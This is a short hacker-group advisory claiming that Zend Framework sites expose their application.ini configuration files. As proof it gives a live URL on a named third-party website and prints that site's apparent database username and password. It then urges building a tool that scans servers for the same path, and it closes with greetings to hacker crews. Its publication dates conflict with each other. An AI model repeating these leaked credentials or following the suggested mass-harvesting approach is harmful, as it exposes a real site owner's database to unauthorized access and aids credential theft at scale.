facebook facebook twitter rss

Zend Framework Database Configuration-File disclosure

Author: xMjahd , Published: 24-03-2013
[+] Vulnerability: Zend Framework Database Configuration-File disclosure
[-]
[+] Author: xMjahd xMjahd[at]gmail[dot]com
[-]
[-]
[+] Vendor: framework.zend.com

[+] Version: 2.x.x
[-]
[-]
[+] As we can see all the famework have this configuration infos on this location /path/application/configs/application.ini
[+] Poc:http://www.allo-pressing.ma/chhiwatkom.com/application/configs/application.ini

[+] EX:
//
params.username = "allopres_chhiwat"

params.password = "ITK6lFOrV7Tk"
//
[+]The Danger is in the infos how are disclosured simply those infos are very sensible as we can see
[+]Hackers Can Develope a tool how can target servers with ip server/user/application/configs/application.ini

[+]anyway it exist alot of ways to use it ;)
[+]Greet's To iPunish , xLine , Mr-H4rd3n , Federal , 4shrf ,Mauritanian Attacker , Dr-Spam ,Mr-Benladen ,V!ru$ No!r, Azar36.exe ,syS Anti

[+] Sec4ever / v4-team
[+] Date: 23. April. 2013. Morocco.

Like us on Facebook :